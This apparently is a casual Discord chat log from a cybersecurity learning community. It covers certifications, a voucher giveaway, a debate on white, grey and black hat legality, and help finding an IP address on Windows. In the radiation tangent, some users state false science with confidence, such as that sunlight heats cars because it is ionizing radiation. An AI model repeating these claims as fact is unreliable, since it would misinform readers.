no, im business intelligence student, looking into cybersec
sick lance
@mossy river care to set up a community give away?
mossy river
<@270975958511517697> care to set up a community give away?
Hm?
simple valve
OSWE is in my eyes but maybe CRTL too if time permits. Also eyeing pwnedlabsā AWS red team cert
sick lance
Hm?
I have a subscription code that's no use to me, #community-announcements give away?
hollow inlet
yes yes
mossy river
I have a subscription code that's no use to me, <#773968374870966292> give away?
How about you add it to Bellaās list? š
simple valve
I can guarantee CRTO is good, acces to Cobalt Strike makes it super fun lol
sick lance
How about you add it to Bellaās list? š
https://discord.com/channels/52138221...
Could do.
@chilly veldt add a 6 month THM voucher to your list. š
hollow inlet
how do we enter the giveaway :0
tough widget
Good afternoon everyone. There is a Governance and regulation room I am starting today for my GRC journey and just wanted to know Are there any other rooms I could supplement it with?
lean widget
I can guarantee CRTO is good, acces to Cobalt Strike makes it super fun lol
Can you explain after what level can you consider getting CRTO?
simple valve
Try out Mythic if you have time. I hear its better if you plan to customize
tough widget
Thank you, I will look at it. Would be nice if more rooms could be made specifically for GRC and that career path.
twin ridgeBOT
Gave +1 Rep to @fervent meteor (current: #58 - 151)
chilly veldt
(happy that I didn't get timed out for mass ping)
simple valve
Can you explain after what level can you consider getting CRTO?
It really depends, I can definitely say the techniques outlined under CRTO are enough to pass.
sick lance
If you edit the message it doesn't ping.
chilly veldt
If you edit the message it doesn't ping.
what about forward?
sick lance
what about forward?
I didn't get the ping for that, so no. š
chilly veldt
ah, bot might still think it's a ping 
simple valve
Is April the deadline here
chilly veldt
yes
chilly veldt
the giveaway will happen the 4th-11th of april
and it sounds like @shut hawk is doing nicely
shut hawk
š«”
mellow narwhal
Keep gymming it out
karmic hemlock
Big blob
neat belfry
I understand what youāre saying <@1114270612559507577> And you are correct, but ...
the title of the video combined with the ending phrase "don't fry your brains" clearly suggests that the video is potraying
a look at a microwave as potentially dangerous
the wording he used implis that there are risks associated with staring at a microwave
mossy river
Mhm, you are right
karmic hemlock
What if there are?
neat belfry
What if there are?
but there arent.
plain tartan
Maybe not if you're standing away from it a little bit. I could 100% see people pressing their face against the window though.
opaque flax
I'm gonna stare at my microwave when I get home now
How else will I. Know if my food is done?
mossy river
Maybe not if you're standing away from it a little bit. I could 100% see people ...
This is my point exactly
karmic hemlock
my eyes crave radiation poisoning
neat belfry
Maybe not if you're standing away from it a little bit. I could 100% see people ...
even pressing your face against the window is in no way dangeroos
mossy river
even pressing your face against the window is in no way dangeroos
It is
mossy river
The grate on the front of the microwave screen blocks microwaves
neat belfry
non ionizing radation
karmic hemlock
non ionizing radation
sounds like something my eyes need a lot of
neat belfry
is radiation that dosent have enough power, to strip eletrons away,
mossy river
Microwaves are still dangerous to humans, thatās why they have that casing around the microwave with dots on the front panel
Microwaves can heat the water inside your body, as well as damage your eyes
Looking into a microwave is fine, pressing your face against a microwave isnāt recommended
karmic hemlock
My face craves a microwave mask
neat belfry
ionizing radiation, has the power to strip eletrons away from an atom (which is why it is dangourus) btw heat is caused do to eletrons movement and interaction FYI which is why your car is so hot when it is under the sun, it is metal and metal has valancey eletrons that can easly be disattached from the atom and thus creating the movement which is why your car is hot when exposed to ionizing radation AKA sunlight.
and ionizing radiation also causes cellular damage
which increases the risk of a fault in the dna making process
which can lead to cancer
karmic hemlock
I just realized I need more sunlight
neat belfry
which is why people say ionizng radiation is dangourus
and non ionizing isnt
but
BUT
BUT
GUYS
forest fractal
why are we in chemistry already XD HAHAHHA jkjk
mossy river
Microwaves can cause tissue damage and heat up the liquid inside your body causing it to boil
It wonāt happen from a modern microwave, but if your microwave is damaged itās best to not put your face up against it
neat belfry
if the microwave is leaking radiation
Like the microwave isnt working properly and ur exposed to all of the radiation
karmic hemlock
God I hope my microwave is leaking radiation
mossy river
karmic hemlock
how do you make the colors?
There are filters in graph view you can set
neat belfry
becuase if you stare right at it, it can damage your eye, because of localized heating
which is why people tell you not to look at the sun
with a magnifying glass
very dangerous
very
mossy river
becuase if you stare right at it, it can damage your eye, because of localized h...
So we both agree š
neat belfry
VERY
neat belfry
So we both agree š
yep, to some extent
plain tartan
š
karmic hemlock
I look at the sun šŖ
neat belfry
I look at the sun šŖ
thats ok, but dont look at it with a magnifying glass.
DONT
I WARN
karmic hemlock
Yk warning me not to do something is going to make me more likely to do it
neat belfry
because fyi if you shine a bright light at a magnifying glass and point it at paper, the paper burns......
plain tartan
I mean... I wouldn't stick any appendages in a microwave. As such, I would not trust pressing my face against it as a being safe.
mossy river
you shouldnāt look at the sun magnifying glass or not
neat belfry
because fyi if you shine a bright light at a magnifying glass and point it at pa...
you get my point..
near sapphire
There are filters in graph view you can set
I dont seem to see the option for colors?
neat belfry
you shouldnāt look at the sun magnifying glass or not
yea, it can cause solar retinopathy which can damage ur vision, cuz the light
can burn ur retina
but like
u'd have to be looking at it
for a long time
and ur body tells u when it is causing damage
karmic hemlock
Why are we having biochem class in a cybersec server anyway
neat belfry
which is why u wouldnt want to have a superpower that makes u feel no pain
@mossy river
karmic hemlock
which is why u wouldnt want to have a superpower that makes u feel no pain
That's a goated superpower wtf are you talking about
neat belfry
That's a goated superpower wtf are you talking about
thats the dumbest thing u can have
karmic hemlock
I'd be invincible
neat belfry
I'd be invincible
what?
mossy river
Itās not a super power at sll
lament tendon
I'd be invincible
No you would not be, just not would not notice when your arm falls off. ;D
plain tartan
No you would not be, just not would not notice when your arm falls off. ;D
Tis but a scratch
mossy river
Itās a medical condition called CIPA š
neat belfry
do u know pain is a message, that ur body tells u, to stop fucking around, like when u punch the wall or smth
neat belfry
Itās a medical condition called CIPA š
yea ik
near sapphire
ah thanks
twin ridgeBOT
Gave +1 Rep to @karmic hemlock (current: #393 - 15)
neat belfry
Itās a medical condition called CIPA š
ive seen a video about a girl with a condition that makes her not feel pain
mossy river
ive seen a video about a girl with a condition that makes her not feel pain
A TV show you mean?
plain tartan
They also made an episode of House about that
mossy river
They also made an episode of House about that
^
karmic hemlock
Regeneration + no pain = invincibility
neat belfry
A TV show you mean?
no, like a video on it, a real life event
like there was a girl with congneital
insesitivity
to pain with anhidrosis
or CIPA
mossy river
Ah right
neat belfry
There are known women who have a mutation to not feel pain.
true
mossy river
Itās a very interesting condition
neat belfry
Itās a very interesting condition
yea
karmic hemlock
Yall have fun with biology lab, I'll be back this afternoon
neat belfry
Yall have fun with biology lab, I'll be back this afternoon
biology is my fav
then physics
rapid merlin
https://www.bbc.co.uk/news/uk-scotland-highlands-islands-47719718
I thought that was just audhd related
karmic hemlock
physics L
rapid merlin
Feeling almost no pain
neat belfry
NEURO
karmic hemlock
Chem W
sick lance
NEURO
If you continue to post so many messages in short psace of time, you maybe auto-muted from the bot.
neat belfry
If you continue to post so many messages in short psace of time, you maybe auto-...
what a way to kill the vibe
plain tartan
Just looking out for you is all
sick lance
what a way to kill the vibe
It's a friendly note, take what you will.
austere verge
Iām lurkin from the toilet 
sick lance
what a way to kill the vibe
Next time I won't say and let you get muted.
lime belfry
VirtualBox - Error In supR3Hardened WinReSpawn
NtCreateFile(\Device\VBoxDrvStub) failed: 0xc0000034 STATUS_OBJECT_NAME_NOT_FOUND (0 retries) (rc=-101)
Make sure the kernel module has been loaded successfully.
where: supR3HardenedWinReSpawn what: 3 VERR_OPEN_FAILED (-101) - File/ Device open failed. Driver is probably stuck stopping/starting. Try 'sc.exe query vboxsup' to get more information about its state. Rebooting may actually help.
can someone help me with this
it happened after I updated VirtualBox
neat belfry
Next time I won't say and let you get muted. <:kekw:658061932577816606>
š L auto-mute
neat belfry
Next time I won't say and let you get muted. <:kekw:658061932577816606>
wait i got a question, who coded this server bot?
sick lance
wait i got a question, who coded this server bot?
@mossy river coded TryModrrateMe.
neat belfry
<@270975958511517697> coded TryModrrateMe.
TYPE SHITTTT
MY BOI JABBA KNOW HW TO CODE
austere verge
Try rebooting
neat belfry
thts my boi
mossy river
<@270975958511517697> coded TryModrrateMe.
Thatās a different bot, TMM doesnāt auto mute
raw mountain
When does the results for the SOC Simulator competition get released?
sick lance
Thatās a different bot, TMM doesnāt auto mute
I know, thats why I named it. š
neat belfry
Thatās a different bot, TMM doesnāt auto mute
yo jabba can i dm u
mossy river
Go for it
sudden vigil
Anyone know about how many users are on THM?
I'd like to calculate my %
sick lance
Anyone know about how many users are on THM?
I'd like to calculate my %
I can't give you an exact number l.
sudden vigil
I can't give you an exact number l.
estimate lol
sick lance
sudden vigil
ok ty!
near sapphire
im hungry but I only have instant noodles
mellow gull
Theoretically a small portion of those are probably alts/remakes
sick lance
Theoretically a small portion of those are probably alts/remakes
Still accounts on the website.
They didn't ask for active
mellow gull
Fair enough! 
sudden vigil
In the % calculating does active matter?
neat belfry
@mossy river
near sapphire
In the % calculating does active matter?
like top % ?
sudden vigil
Yes
sick lance
does anyone know how jabba sounds like
Yes
sick lance
how does he sound like?
Like Jabba š
near sapphire
plot twist jabba is a girl whos catfishing us
mellow gull
Like a human, presumably (I don't want to assume).
neat belfry
or a sexy voice? like drake
mellow gull
Man Jabba really getting the k-pop idol treatment over here.
sick lance
Id never reveal any information I know about anyone on here.
austere verge
Heās obviously Batman
neat belfry
@mossy river
wet sapphire
Any reason I canāt use the AttackBox when I havenāt touched it today? Telling me I already reached the 1 hour limit
austere verge
Any reason I canāt use the AttackBox when I havenāt touched it today? Telling me...
Maybe u used it last night 12-1 ;-;
near sapphire
Id never reveal any information I know about anyone on here.
does it also include the information of whether or not jabba is human š
neat belfry
<@270975958511517697>
if you need any tips, im open
or any life advice
or any coding lessons
or any lessons about ethical hacking
advice
or anything
im open to dms
mellow narwhal
This was funny:
Logged in to Shodan through Google SSO --> Accidentally opened Gmail --> Looked for scan results --> Found a link to a Quora post --> Spent half an hour reading some romance trash Whatsapp screenshots
mellow gull
mellow narwhal
I am the master of falling down rabbit holes
neat belfry
This was funny:
Logged in to Shodan through Google SSO --> Accidentally opened ...
not rlly
tht dosent make me laugh
i have a complelty different humor
wet sapphire
Maybe u used it last night 12-1 ;-;
Not that I know ofš
near sapphire
do you just conviently have this meme available š
neat belfry
mellow gull
do you just conviently have this meme available š
It's hard work but it's honest.
near sapphire
I am gratefull my uni has public transport
rapid merlin
This was funny:
Logged in to Shodan through Google SSO --> Accidentally opened ...
I get some of the weirdest romance ads come up on YouTube shorts
sand trench
???? but shadow just updated their linux system and reinstalled discord completely ????
austere verge
???? but shadow just updated their linux system and reinstalled discord complete...
Somebody on GitHub said itās usually bc of missing libatomic now idk what that is but u can look into it
sand trench
Somebody on GitHub said itās usually bc of missing libatomic now idk what that i...
that package does not seem to exist for arch though
austere verge
Auh
upper minnow
I just installed my discord in arch through the app to install stuff
Seemed more practical
sand trench
never mind found it
blazing granite
I don't use arch btw š
rapid merlin
My brother reset my all rooms wthhh
austere verge
Be like me and remember every room youāve ever done (only ever done like 15)
graceful mauve
Someone tell me the difference between a white hat, a grey hat and a black hat without a shitty answer
near sapphire
Someone tell me the difference between a white hat, a grey hat and a black hat w...
white hat is 100% ethical, black hat is 0% and grey is 50%
upper minnow
Its according to legality
opaque flax
Someone tell me the difference between a white hat, a grey hat and a black hat w...
White hat - stays within the law
Grey hat - willing to break some laws
Black hat - breaks any law doesnāt care will target anyone
celest dirge
I use the web version
I also use the web version just to save some mem
upper minnow
This is a white hat server
graceful mauve
White hat - stays within the law
Grey hat - willing to break some laws
Black h...
Grey hats aren't technically breaking laws, they are pretty just doing white hat things in an unethical manner
opaque flax
Grey hats aren't technically breaking laws, they are pretty just doing white hat...
They are
near sapphire
Grey hats aren't technically breaking laws, they are pretty just doing white hat...
which is breaking the law
austere verge
I also use the web version just to save some mem
Some ppl act like itās the most disgusting thing ever
opaque flax
Doing any hacking in an unethical manner is breaking a law
celest dirge
Some ppl act like itās the most disgusting thing ever
Using white mode has to be tho
shut hawk
Grey hats aren't technically breaking laws, they are pretty just doing white hat...
you are either breaking the law (black hat) or not breaking the law (white hat)
neat belfry
nah i found a funny ass real but idk if i can send it here
mellow gull
White hat activities are only legal because they're doing it in an ethical manner with permission from an organization. Grey hats (your "hacktivisits") are still breaking the law.
graceful mauve
They are
The law being broken requires law enforcement, otherwise there would be no point in enforcing laws right? So it's just unethical
It's the people that don't know what they're doing that are breaking laws
mellow gull
The law being broken requires law enforcement, otherwise there would be no point...
This is certainly a take. A wrong one, but a take.
austere verge
Using white mode has to be tho
I use eclipse in the default white mode
opaque flax
The law being broken requires law enforcement, otherwise there would be no point...
Using a computer to gain unauthorized access is illegal and unethical
upper minnow
Grey hat seems more like ethical illegal hacking
high mulch
black hat use dark mode, white hats use light mode.
near sapphire
black hat use dark mode, white hats use light mode.
<:kekw:658061932577816606>
ah so i'm a black hat then
this is a joke and I am not a black hat
blazing granite
sand trench
welp none of the fixes work D:
opaque flax
Also ignorance of the law is not a defense of a crime
austere verge
:[
graceful mauve
Using a computer to gain unauthorized access is illegal and unethical
Yeah, simply put, that is true. Hats are just intent really
graceful mauve
Also ignorance of the law is not a defense of a crime
"but the stop light looked green"
shut hawk
Yeah, simply put, that is true. Hats are just intent really
No, you either break the law or you don't break the law
opaque flax
Yeah, simply put, that is true. Hats are just intent really
So a gray hat is commiting crimes. Hacking a scammer could be seen as ethical but it is still illegal
mellow gull
Hats are not just intent, please don't misconstrue the legality of cybercrime with metaphorical nuance.
high mulch
graceful mauve
Hats are not just intent, please don't misconstrue the legality of cybercrime wi...
Hats are stupid
neat belfry
I'm a white hat
graceful mauve
Just do it or sit there eating eggs
high mulch
has anyone used the Thinkcloudly SOC program?
Good or nah?
neat belfry
Using a computer to gain unauthorized access is illegal and unethical
the police do that all the timeš¤·āāļø
austere verge
Sometimes when a electric scooter rider whizzes past me I feel like kicking them but then I remember I could seriously hurt someone doing that š
sick lance
I look stupid with hats on
opaque flax
the police do that all the timeš¤·āāļø
-
If they do it without a warrant or an exception to the warrant requirement itās still a crime
-
If they do it without a warrant or an exception to the warrant requirement it is not unethical or a crime by societal standards
austere verge
A beanie then maybe
neat belfry
1. If they do it without a warrant or an exception to the warrant requirement it...
what if you gain unortharized access, to solve a crime
and your not LE
upper minnow
still illegal
mellow gull
Inadmissible in court and you'd be charged?
neat belfry
still illegal
what??
austere verge
Vigilantism is usually illegal
opaque flax
It depends on the facts of the case
rapid merlin
rapid merlin
Be like me and remember every room youāve ever done (only ever done like 15)
i did 20
opaque flax
what if you gain unortharized access, to solve a crime
Itās a different crime
Itās not an illegal search
Itās unauthorized use of a computer
neat belfry
so like of theres a seriel murder on the luce, and i manage to track him down and call the police on him, is that still illegal?
neat belfry
you cant be solving crimes if you aint police
well what if their asses cant do their job?
mellow gull
If you did so through illegal channels, it's illegal, period.
opaque flax
so like of theres a seriel murder on the luce, and i manage to track him down an...
It gets really murky
upper minnow
well what if their asses cant do their job?
thats why some ppl take the matters in their own hands
opaque flax
It really depends on the facts of the case
neat belfry
If you did so through illegal channels, it's illegal, period.
horrible, corrupt law system
opaque flax
But you will probably get hit with a crime too
high mulch
so like of theres a seriel murder on the luce, and i manage to track him down an...
Depends on the methods you employee ig.
I know someone who does or did this, but he'd have a PI licence. Idk now, I have lost contact with the individual.
mellow gull
That's the opposite of the law system being corrupt.
austere verge
U should play persona 5 š¤
upper minnow
but yea you can still be charged
opaque flax
Fruit of the poisonous tree would not come into effect because it applies only to law enforcement
But a defense attorney would likely be able to get that evidence suppressed
upper minnow
lawforce do be incompetent though, i agree with that
opaque flax
As it was obtained by you by illegal means
And the chain of evidence would be broken likely
neat belfry
lawforce do be incompetent though, i agree with that
yes, very, they dont know how to use computers well
upper minnow
but you cant do anything (legally) about it
graceful mauve
neat belfry
As it was obtained by you by illegal means
what if u offerd the police to help them
mellow gull
This is not a complicated concept.
opaque flax
You canāt just offer to help them and then go commit any crimes
neat belfry
like u call 911 and be like; yo, i can hack n shit, and can help yall mf's find the criminal type shit.
upper minnow
https://tenor.com/view/get-real-chinese-egg-man-chinese-guy-eats-raw-eggs-raw-eg...
this will hunt my nightmares
upper minnow
like u call 911 and be like; yo, i can hack n shit, and can help yall mf's find...
they are going to refuse
sand trench
huh that is weird
austere verge
what if u offerd the police to help them
U can just get a law enforcement job atp š
sand trench
the discord canary build does not have the error message
neat belfry
U can just get a law enforcement job atp š
no, I am not gonna be employed by the feds
i will never help the feds
austere verge
-_-
neat belfry
theyre racist and corrupt
opaque flax
`i will never help the feds`
So donāt call and offer help first of all
mellow gull
Kids these days.
rapid merlin
you cant be solving crimes if you aint police
you can solve and help tho
neat belfry
you cant be solving crimes if you aint police
well, jidion does it
graceful mauve
This is not a complicated concept.
Black hat hackers have malicious intent when they take over systems.
Grey hats don't have authorization when attacking systems but have the intent of disclosing it. (Which is technically illegal)
White hats only hack where they are authorized to
upper minnow
never heard of him
neat belfry
never heard of him
huh????
mellow gull
Black hat hackers have malicious intent when they take over systems.
Grey hats d...
Okay? The law doesn't care about your distinction, why are we still talking about this?
neat belfry
never heard of him
how do u now know jidion???
upper minnow
again im not american
neat belfry
bro he's famous everywhere
median pollen
Black hat hackers have malicious intent when they take over systems.
Grey hats d...
Can I be a purple hat hacker?
graceful mauve
Okay? The law doesn't care about your distinction, why are we still talking abou...
What else do you want to talk about?
upper minnow
i dont know every american vlogger around
graceful mauve
Can I be a purple hat hacker?
Yes
blazing granite
the chat is š„ š
high mulch
stable rock
what do you know this server is actually relatively active, thought for sure this would be one of those lame official servers where everyone ignores one another
neat belfry
again im not american
he used to be a funny ass prankster, like he'd go to walmart or the police station, and troll them hardš like for example, he faked pulling a fire alarm, he made the royal guard laugh, trolled a bunch of police officers, like he's hella funny
neat belfry
every day, i'd wait for him to upload
just go get a good laugh
very famous
then he got old
and decided to quit
and become a christian
graceful mauve
Yay I can hack for fun and meme purposes
That's not what a purple hat does lmao
stable rock
and become a christian
who did
graceful mauve
That's a black hat
neat belfry
but he uploads vids of him catching criminals, preds etc
median pollen
That's not what a purple hat does lmao
But I want to be a meme hacker
graceful mauve
But I want to be a meme hacker
Then you'll become a meme
upper minnow
what do you know this server is actually relatively active, thought for sure thi...
tcm academy was like that
median pollen
Then you'll become a meme
Yay now I can try hacking and fail miserably allegedly
neat belfry
the streamer ?
yea
blazing granite
and become a christian
a hacking evangelist š
neat belfry
the streamer ?
and youtuber
graceful mauve
Yay now I can try hacking and fail miserably allegedly
No, it's illegal to even try
stable rock
and youtuber
i heard he deleted all his socials and stuff good on him bettering his life
graceful mauve
You don't have authorization
rapid merlin
never heard of him
mostly black hat are hacktivist
opaque flax
mostly black hat are hacktivist
This is incorrect too
median pollen
No, it's illegal to even try
Fine
upper minnow
mostly black hat are hacktivist
i was talking about this jidion guy
opaque flax
APTs and nation states are not activists
rapid merlin
This is incorrect too
you can go with 50 50
near sapphire
when's thm birthday
rapid merlin
i was talking about this jidion guy
ik that guy but what i think is this guy has some connections to keep the guy safe
upper minnow
APTs and nation states are not activists
we enter some dubious legality with nation states
cloud quiver
when's thm birthday
In nov i think š
opaque flax
we enter some dubious legality with nation states
We consider APTs and nation states (that arenāt the US) to be black hats for sure
upper minnow
yea but if a russian hacker hacks the US its probably legal in russia
why would he care about US legality
graceful mauve
Can I ping localhost to get my IP?
upper minnow
use ifconfig
opaque flax
The USA considers the NSA to not be an APT but garunteed china and Russia consider the NSA to be an APT
rapid merlin
Kitkats are always good chocolates
stable rock
Kitkats are always good chocolates
kitkats are a cake
upper minnow
its kinda hypocritical to not count the US as black hat when they do it to other countries
sick lance
No politics
graceful mauve
use ifconfig
It doesn't work
boreal scarab
No politics
Shoooo, go away. I like to have my fair share of drama!
opaque flax
its kinda hypocritical to not count the US as black hat when they do it to other...
I think it just comes down to the perspective of the person doing analysis
boreal scarab
sick lance
Can I ping localhost to get my IP?
Localhost is 127.0.01.
mellow gull
Yeah it all depends on the nation you are in
In all fairness foreign nations have a term for this called extradition. You can still be charged for crimes committed in another country (especially cybercrime), and brought to that country for sentencing.
boreal scarab
Localhost is 127.0.01.
Actually, it's 127.0.0.1
graceful mauve
Localhost is 127.0.01.
So is that my public IP address?
boreal scarab
Get it right SCRUBZ
opaque flax
In all fairness foreign nations have a term for this called extradition. You can...
Sure if the nation has an extradition treaty
rapid merlin
https://tenor.com/view/modern-family-spray-squirt-annoyed-irritated-gif-11864636...
I have a spray bottle. I never thought of this before but itās a great idea
opaque flax
Or if itās in pursuit of a greater goal
sick lance
So is that my public IP address?
No, that's your local host.
Which os are you in?
opaque flax
Like peace relations
graceful mauve
No, that's your local host.
Which os are you in?
I'm windows
mellow gull
A country will still make the request, even if they don't have a treaty, and they'll remember your name and come and getcha if you end up anywhere they can reach you.
neat belfry
A country will still make the request, even if they don't have a treaty, and the...
or they might fly out agents to capture u
sick lance
I'm windows
IPconfig or ifconfig
opaque flax
A country will still make the request, even if they don't have a treaty, and the...
Yeah for sure. Lots of hackers in Russia and china have been caught because they went to a European country with an extradition treaty to the US
graceful mauve
IPconfig or ifconfig
Ifconfig isn't working..
upper minnow
or they might fly out agents to capture u
unles s the other country agrees its illegal
opaque flax
Ifconfig isn't working..
Ip a
upper minnow
ooooh powershell
opaque flax
In powershell?
Ip a is bash
neat belfry
like julian assange, the cia even debeted going to the country he was hiding in, bringing in agents to kidnapp him, nd take him on a flight home, or they even considerd shooting him
upper minnow
i thought you were on linux
sick lance
Ifconfig isn't working..
Try IPconfig
neat belfry
i dont wanna mess with them
opaque flax
Ipconfig is for poweshell/windows
graceful mauve
Ip a is bash
Ahh
high mulch
In powershell?
Get-NetAdapter -Physical | Get-NetIPConfiguration
upper minnow
like julian assange, the cia even debeted going to the country he was hiding in,...
yea but thats cos the US is always doing illegal stuff
graceful mauve
Try IPconfig
Alright it works but is it normal to see 10 different connections?
graceful mauve
`Get-NetAdapter -Physical | Get-NetIPConfiguration`
Ty
twin ridgeBOT
Gave +1 Rep to @high mulch (current: #231 - 31)
sick lance
Alright it works but is it normal to see 10 different connections?
Depends what is using Which interface
mellow gull
Alright it works but is it normal to see 10 different connections?
If you've set up a Hypervisor at any point it can set up a bunch of persistent interfaces that show up.
graceful mauve
Depends what is using Which interface
Some interfaces which I haven't heard of before
neat belfry
yea but thats cos the US is always doing illegal stuff
nah, tbh if i was a government i'd be that pissed
he tormented us embassy officials
leaked a lot of classified docs
a ton
of embarrasing
vids
of horrible stuff
graceful mauve
If you've set up a Hypervisor at any point it can set up a bunch of persistent i...
Yeah I've set up a hypervisor but there's other connections unrelated, are these other interfaces set up on my host?
fiery imp
Bruhh, I almost banged my head while solving this room. 10/10
upper minnow
Bruhh, I almost banged my head while solving this room. 10/10
thoguht medium rooms wound earn more points
near sapphire
nope
fiery imp
thoguht medium rooms wound earn more points
I don't think so
high mulch
thoguht medium rooms wound earn more points
Those only exist to make your life miserable :P
mellow gull
Yeah I've set up a hypervisor but there's other connections unrelated, are these...
Well without knowing more I can't answer that question for you. If you've got VMware you'd see a bunch of VMNet interfaces. You might see multiple Ethernet connections, or multiple LAN, or- etc etc.
neat belfry
Ipconfig is for poweshell/windows
to enable wsl, open powershell as admin, run wsl -- install, restart ur computer, and it also installs defult linix distribution (usually ubuntu0 then insall net tools in linux terminal
write this int he terminal
sudo apt update
sudo apt install net-tools
after installation, u can use ifconfig in wsl terminal
neat belfry
@graceful mauve
fiery imp
y'll got any good room suggestion?
graceful mauve
<@230316889069322241>
Ty
neat belfry
if u want smth simpler
u can download netools for windows, like nirsot network tools
graceful mauve
Did you know that you can use the entire local host under the CIDR notation of 127.0.0.1/8
Hah
fiery imp
Bruhh, I almost banged my head while solving this room. 10/10
ty @rough gorge for the walkthrough!
twin ridgeBOT
Gave +1 Rep to @rough gorge (current: #231 - 31)
rapid merlin
How comes on the website thereās a easy path for blue team on soc but junior pentest starts at intermediate š„¹
There should be an easy room for dummies like me
graceful mauve
How comes on the website thereās a easy path for blue team on soc but junior pen...
More experience is required for penetration testing
near sapphire
who here has ever found a 0-day, i know jayy has and aquinas too i think? and maybe 0day, anyone else
neat belfry
yes it is
rapid merlin
who here has ever found a 0-day, i know jayy has and aquinas too i think? and ma...
I find 0 day sales at the store when Iām hungry
high mulch
stop the cap, it is
rapid merlin
That made sense in my head
high mulch
neat belfry
its when u kinda do a cyper attack against a cmpter system, ntwork, or web to identify vulnerabiltites
tht attackers could exploit
for the org
not tht hard
rapid merlin
Okay without stirring it yeah. I though blue side was harder
rapid merlin
Right
graceful mauve
Yeah, it's a lot easier to talk about it than to actually do it
neat belfry
Yeah, it's a lot easier to talk about it than to actually do it
dude ive done it before
rapid merlin
š„¹
graceful mauve
dude ive done it before
Done what?
high mulch
Okay without stirring it yeah. I though blue side was harder
both are tedious